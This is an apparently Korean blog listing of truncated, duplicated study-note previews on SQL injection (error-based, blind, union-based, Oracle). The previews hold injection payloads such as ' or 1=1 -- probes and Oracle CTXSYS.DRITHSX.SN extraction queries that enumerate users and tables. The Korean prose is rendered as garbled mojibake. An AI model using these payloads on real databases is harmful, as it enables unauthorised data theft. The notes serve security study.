๐ Secure
-
์์ฐจ์ ์ ๊ทผ ๋ฐฉ์ ๋ฐ์ดํฐ ๋ฒ ์ด์ค ์ด๋ฆ ํ์ธ # ๋ฐ์ดํฐ ๋ฒ ์ด์ค ์ด๋ฆ ํ์ธ SELECT * FROM information_schema.schemata SCHEMA_NAME ๋ฐ์ดํฐ ๋ฒ ์ด์ค ์ด๋ฆ์ ๋ชจ์๋์ ํญ๋ชฉ ๋ฐ์ดํฐ๋ฒ ์ด์ค ํ ์ด๋ธ ๋ชฉ๋กํ # ๋ฐ์ดํฐ๋ฒ ์ด์ค ํ ์ด๋ธ ๋ชฉ๋กํ SELECT * FROM information_schema.talbes; TABLE_SCHEMA ๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ TABLE_NAME ํ ์ด๋ธ ์ด๋ฆ COLUMN_NAME ์ปฌ๋ผ ์ด๋ฆ 'board'๋ผ๋ ๋ฐ์ดํฐ๋ฒ ์ด์ค์ ๋ค์ด์๋ 'table'์ด๋ฆ๋ค์ด ์๊ณ ์ถ์๋ # 'board'๋ผ๋ ๋ฐ์ดํฐ๋ฒ ์ด์ค์ ๋ค์ด์๋ 'table'์ด๋ฆ๋ค์ด ์๊ณ ์ถ์๋ SELECT table_name FROM information_schema.tables WHERE table_schem..
SQL Injection - Error Based์์ฐจ์ ์ ๊ทผ ๋ฐฉ์ ๋ฐ์ดํฐ ๋ฒ ์ด์ค ์ด๋ฆ ํ์ธ # ๋ฐ์ดํฐ ๋ฒ ์ด์ค ์ด๋ฆ ํ์ธ SELECT * FROM information_schema.schemata SCHEMA_NAME ๋ฐ์ดํฐ ๋ฒ ์ด์ค ์ด๋ฆ์ ๋ชจ์๋์ ํญ๋ชฉ ๋ฐ์ดํฐ๋ฒ ์ด์ค ํ ์ด๋ธ ๋ชฉ๋กํ # ๋ฐ์ดํฐ๋ฒ ์ด์ค ํ ์ด๋ธ ๋ชฉ๋กํ SELECT * FROM information_schema.talbes; TABLE_SCHEMA ๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ TABLE_NAME ํ ์ด๋ธ ์ด๋ฆ COLUMN_NAME ์ปฌ๋ผ ์ด๋ฆ 'board'๋ผ๋ ๋ฐ์ดํฐ๋ฒ ์ด์ค์ ๋ค์ด์๋ 'table'์ด๋ฆ๋ค์ด ์๊ณ ์ถ์๋ # 'board'๋ผ๋ ๋ฐ์ดํฐ๋ฒ ์ด์ค์ ๋ค์ด์๋ 'table'์ด๋ฆ๋ค์ด ์๊ณ ์ถ์๋ SELECT table_name FROM information_schema.tables WHERE table_schem..
2022.07.06 -
Contents Based search_type=1=1+andtitle&keyword=test# ์ฐธ :๊ธฐ์ค๋ฌธ์ test๊ฐ ์ถ๋ ฅ search_type=1=2+andtitle&keyword=test# ๊ฑฐ์ง : ๊ธฐ์ค๋ฌธ์ test๊ฐ ์ถ๋ ฅ ๋์ง ์์ Blind Based ์๋ฒ์ ์ฐธ/๊ฑฐ์ง์ ์๋ต๊ฐ์ ๊ฐ์ง๊ณ ๋ฌธ์์ด์ ์ ์ถ 3๊ฐ์ง ํ์ ๋ฐฉ์ 1. ์์ฐจ ํ์ 2. ์ด์ง ํ์ 3. ๋นํธ ์ฐ์ฐ ํ์ ๋น ์์ฐจ ํ์๋ฐฉ์ ( ๋ฉํ๋ฐ์ดํฐ ์กฐํ ) # 1. ์ฌ์ฉ์ ๊ณ์ ๊ฐ์ ์ธ๊ธฐ SELECT count(*) FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE owner like '%C##%'; # rownum์ 1์ค๋ง ์ถ๋ ฅํ๊ธฐ์ํด ( ํ๋์..
Oracle Blind BasedContents Based search_type=1=1+andtitle&keyword=test# ์ฐธ :๊ธฐ์ค๋ฌธ์ test๊ฐ ์ถ๋ ฅ search_type=1=2+andtitle&keyword=test# ๊ฑฐ์ง : ๊ธฐ์ค๋ฌธ์ test๊ฐ ์ถ๋ ฅ ๋์ง ์์ Blind Based ์๋ฒ์ ์ฐธ/๊ฑฐ์ง์ ์๋ต๊ฐ์ ๊ฐ์ง๊ณ ๋ฌธ์์ด์ ์ ์ถ 3๊ฐ์ง ํ์ ๋ฐฉ์ 1. ์์ฐจ ํ์ 2. ์ด์ง ํ์ 3. ๋นํธ ์ฐ์ฐ ํ์ ๋น ์์ฐจ ํ์๋ฐฉ์ ( ๋ฉํ๋ฐ์ดํฐ ์กฐํ ) # 1. ์ฌ์ฉ์ ๊ณ์ ๊ฐ์ ์ธ๊ธฐ SELECT count(*) FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE owner like '%C##%'; # rownum์ 1์ค๋ง ์ถ๋ ฅํ๊ธฐ์ํด ( ํ๋์..
2022.07.06 -
Union ๊ธฐ๋ฐ SQL ๊ตฌ๋ฌธ์ ์ ์กํ๊ณ ๊ณต๊ฒฉ์๊ฐ ์๋ํ ๋ฐ์ดํฐ๋ฅผ ๋ฐ๋ ๊ณต๊ฒฉ 1. ์น ์ดํ๋ฆฌ์ผ์ด์ ์กฐ๊ฑด ์ฌ์ฉ์ ์ ๋ ฅ๊ฐ์ ํตํด ์์ฑ๋ ์ปค๋ฆฌ๋ก ๋ฐ์ดํฐ๊ฐ DB์์ ๋ฐํ๋์ด์ผ ํ๋ค 2. ๋ค์ํ ์ ์ฝ ์กฐ๊ฑด ๋์ฉ๋ ๋ฐ์ดํฐ ํ์ ์ ์ค๋ณต ์ ๊ฑฐ๊ฐ ๋ถ๊ฐ๋ฅํ๋ค ( ๋จ, MYSQL ์์ธ ) ๋์ฉ๋ ๋ฐ์ดํฐ ํ์ ์ ์ ๋ ฌ์ด ๋ถ๊ฐ๋ฅํ๋ค ( ๋จ, MYSQL ์์ธ ) ํ์ SELECT ์ ์ ์ปฌ๋ผ ๊ฐ์๋ ๋ฐ๋์ ์์ SELECT ์ปฌ๋ผ ๊ฐ์์ ์ผ์นํด์ผํ๋ค. Union์ผ๋ก ์กฐํํ๋ ค๋ ๋ฐ์ดํฐ์ ์ถ์ถํ๋ ค๊ณ ํ๋ ๋ฐ์ดํฐ์ ํ์ ์ด ์ผ์นํด์ผํ๋ค( ๋จ,MYSQL ์์ธ ) MYSQL์์ ์ฌ์ฉํ๋ ๋์ฉ๋ ํ์ : text, ntext,image ๋ฑ ORACLE์์ ์ฌ์ฉํ๋ ๋์ฉ๋ ํ์ : clob , nclob, bolob ๋ฑ Union๊ณผ Union All..
ORACLE Union BasedUnion ๊ธฐ๋ฐ SQL ๊ตฌ๋ฌธ์ ์ ์กํ๊ณ ๊ณต๊ฒฉ์๊ฐ ์๋ํ ๋ฐ์ดํฐ๋ฅผ ๋ฐ๋ ๊ณต๊ฒฉ 1. ์น ์ดํ๋ฆฌ์ผ์ด์ ์กฐ๊ฑด ์ฌ์ฉ์ ์ ๋ ฅ๊ฐ์ ํตํด ์์ฑ๋ ์ปค๋ฆฌ๋ก ๋ฐ์ดํฐ๊ฐ DB์์ ๋ฐํ๋์ด์ผ ํ๋ค 2. ๋ค์ํ ์ ์ฝ ์กฐ๊ฑด ๋์ฉ๋ ๋ฐ์ดํฐ ํ์ ์ ์ค๋ณต ์ ๊ฑฐ๊ฐ ๋ถ๊ฐ๋ฅํ๋ค ( ๋จ, MYSQL ์์ธ ) ๋์ฉ๋ ๋ฐ์ดํฐ ํ์ ์ ์ ๋ ฌ์ด ๋ถ๊ฐ๋ฅํ๋ค ( ๋จ, MYSQL ์์ธ ) ํ์ SELECT ์ ์ ์ปฌ๋ผ ๊ฐ์๋ ๋ฐ๋์ ์์ SELECT ์ปฌ๋ผ ๊ฐ์์ ์ผ์นํด์ผํ๋ค. Union์ผ๋ก ์กฐํํ๋ ค๋ ๋ฐ์ดํฐ์ ์ถ์ถํ๋ ค๊ณ ํ๋ ๋ฐ์ดํฐ์ ํ์ ์ด ์ผ์นํด์ผํ๋ค( ๋จ,MYSQL ์์ธ ) MYSQL์์ ์ฌ์ฉํ๋ ๋์ฉ๋ ํ์ : text, ntext,image ๋ฑ ORACLE์์ ์ฌ์ฉํ๋ ๋์ฉ๋ ํ์ : clob , nclob, bolob ๋ฑ Union๊ณผ Union All..
2022.07.06 -
CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual)) CTXSYS.CTX_QUERY.CHK_XPATH((SELECT user FROM dual),1) ์๋ก์ด ์ฌ์ฉ์ , ํ ์ด๋ธ, ์ปฌ๋ผ, ๋ฐ์ดํฐ ํ์ธ 1. ์๋ก์ด ์ฌ์ฉ์ ํ์ธ CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=1)) CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=2)) CTXSYS.DRITHSX.SN..
Oracle database ๊ณต๊ฒฉ ์ค์ตCTXSYS.DRITHSX.SN(1,(SELECT user FROM dual)) CTXSYS.CTX_QUERY.CHK_XPATH((SELECT user FROM dual),1) ์๋ก์ด ์ฌ์ฉ์ , ํ ์ด๋ธ, ์ปฌ๋ผ, ๋ฐ์ดํฐ ํ์ธ 1. ์๋ก์ด ์ฌ์ฉ์ ํ์ธ CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=1)) CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=2)) CTXSYS.DRITHSX.SN..
2022.07.05 -
' or 1=1 -- ' and 1=1 -- : ์ถ๋ ฅ o > SELECT * FROM tb_board WHERE title like '%' and 1=1 -- %' ' and 1=2 -- : ์ถ๋ ฅ x 1. ์๋ฌ ์ ๋ฌด ๋ถ์ / ์ทจ์ฝ์ ์ง๋จ / ๊ณต๊ฒฉ ์กฐ๊ฑด๋ฌธ ์์ฑ ' or 1=1 -- ' or 1=2 -- >> ๊ฒฐ๊ณผ๊ฐ ๋์ผํ ๋ ์กฐ๊ฑด๋ฌธ ๊ตฌ๋ฌธ์ด ์๋๋ค ' or 1=1 and 1=1 -- ' or 1=2 and 1=2 -- 2. ํ๊ฒฝ ๋ถ์ 3. ๊ณต๊ฒฉ ์ ํ 4. ๋ฉํ๋ฐ์ดํฐ ์กฐํ 5. rownum ๊ฐ์ ์ปฌ๋ผ # mysql : #,-- (์ฃผ์) # oracle: --(์ฃผ์) SELECT username FROM all_users; > ์ ์ ์ด๋ฆ ์ ์์ถ๋ ฅ SELECT rownum,username FROM all_users..
ORACLE INJECTION' or 1=1 -- ' and 1=1 -- : ์ถ๋ ฅ o > SELECT * FROM tb_board WHERE title like '%' and 1=1 -- %' ' and 1=2 -- : ์ถ๋ ฅ x 1. ์๋ฌ ์ ๋ฌด ๋ถ์ / ์ทจ์ฝ์ ์ง๋จ / ๊ณต๊ฒฉ ์กฐ๊ฑด๋ฌธ ์์ฑ ' or 1=1 -- ' or 1=2 -- >> ๊ฒฐ๊ณผ๊ฐ ๋์ผํ ๋ ์กฐ๊ฑด๋ฌธ ๊ตฌ๋ฌธ์ด ์๋๋ค ' or 1=1 and 1=1 -- ' or 1=2 and 1=2 -- 2. ํ๊ฒฝ ๋ถ์ 3. ๊ณต๊ฒฉ ์ ํ 4. ๋ฉํ๋ฐ์ดํฐ ์กฐํ 5. rownum ๊ฐ์ ์ปฌ๋ผ # mysql : #,-- (์ฃผ์) # oracle: --(์ฃผ์) SELECT username FROM all_users; > ์ ์ ์ด๋ฆ ์ ์์ถ๋ ฅ SELECT rownum,username FROM all_users..
2022.07.05 -
1. ์น์ฌ์ดํธ ์์ฒด ์๋ฌ ํ์ด์ง๊ฐ ๋จ์ง ์์ ๋ 2. ๋ฐ์ดํฐ ๋ฒ ์ด์ค ์๋ต์ด ์๋ ์๋ฒ ์๋ต์ผ๋ก ๋์ฌ ๋ 3. Order by์ ์ด ๋ถ๊ฐ๋ฅํ ๋ ๋ค์ํ Blind ๊ณต๊ฒฉ ๋ฐฉ๋ฒ Content Blind (๊ธฐ์ค๋ฌธ์) Response Blind (์๋ต๋ฉ์ธ์ง) ๋ค์ํ Blind ํ์ ๊ธฐ๋ฒ ์์ฐจ ํ์ ์ด์ง ํ์ ๋นํธ์ฐ์ฐ ํ์ Blind ๊ณต๊ฒฉ ํต์ฌ์ ์๋ฒ์ ์ฐธ๊ณผ ๊ฑฐ์ง์ ์๋ต์ ๊ฐ์ง๊ณ ํ๋ณ Content Based ๊ฒ์ํ ์์ฒด์์ ์ฐธ/๊ฑฐ์ง์ ํ๋ณํ ์ ์๋ ๋ฐ์ดํฐ๊ฐ ์๋ ๊ฒฝ์ฐ ex) test๋ผ๋ ๊ธฐ์ค๋ฌธ์๋ฅผ ๊ฐ์ง๊ณ ๊ฒ์์ ํ์์ ๋ ์ฐธ : test๊ฐ ํฌํจ๋ ๊ตฌ๋ฌธ์ด ์ถ๋ ฅ ๊ฑฐ์ง : ์๋ฌด ๋ฌธ์๋ ์ถ๋ ฅ์ด ๋์ง ์์ Response Based ์๋ฒ์ ์๋ต์ฌ์ด์ฆ๋ฅผ ๋ณด๊ณ ๊ฒฐ์ ์ฐธ : ๊ฒ์๊ธ์ด ์กด์ฌํ์ง ์์ต๋๋ค ๊ฑฐ์ง : ํ์ด์ง ์๋ฌ ์๋ด..
Blind Injection -21. ์น์ฌ์ดํธ ์์ฒด ์๋ฌ ํ์ด์ง๊ฐ ๋จ์ง ์์ ๋ 2. ๋ฐ์ดํฐ ๋ฒ ์ด์ค ์๋ต์ด ์๋ ์๋ฒ ์๋ต์ผ๋ก ๋์ฌ ๋ 3. Order by์ ์ด ๋ถ๊ฐ๋ฅํ ๋ ๋ค์ํ Blind ๊ณต๊ฒฉ ๋ฐฉ๋ฒ Content Blind (๊ธฐ์ค๋ฌธ์) Response Blind (์๋ต๋ฉ์ธ์ง) ๋ค์ํ Blind ํ์ ๊ธฐ๋ฒ ์์ฐจ ํ์ ์ด์ง ํ์ ๋นํธ์ฐ์ฐ ํ์ Blind ๊ณต๊ฒฉ ํต์ฌ์ ์๋ฒ์ ์ฐธ๊ณผ ๊ฑฐ์ง์ ์๋ต์ ๊ฐ์ง๊ณ ํ๋ณ Content Based ๊ฒ์ํ ์์ฒด์์ ์ฐธ/๊ฑฐ์ง์ ํ๋ณํ ์ ์๋ ๋ฐ์ดํฐ๊ฐ ์๋ ๊ฒฝ์ฐ ex) test๋ผ๋ ๊ธฐ์ค๋ฌธ์๋ฅผ ๊ฐ์ง๊ณ ๊ฒ์์ ํ์์ ๋ ์ฐธ : test๊ฐ ํฌํจ๋ ๊ตฌ๋ฌธ์ด ์ถ๋ ฅ ๊ฑฐ์ง : ์๋ฌด ๋ฌธ์๋ ์ถ๋ ฅ์ด ๋์ง ์์ Response Based ์๋ฒ์ ์๋ต์ฌ์ด์ฆ๋ฅผ ๋ณด๊ณ ๊ฒฐ์ ์ฐธ : ๊ฒ์๊ธ์ด ์กด์ฌํ์ง ์์ต๋๋ค ๊ฑฐ์ง : ํ์ด์ง ์๋ฌ ์๋ด..
2022.07.04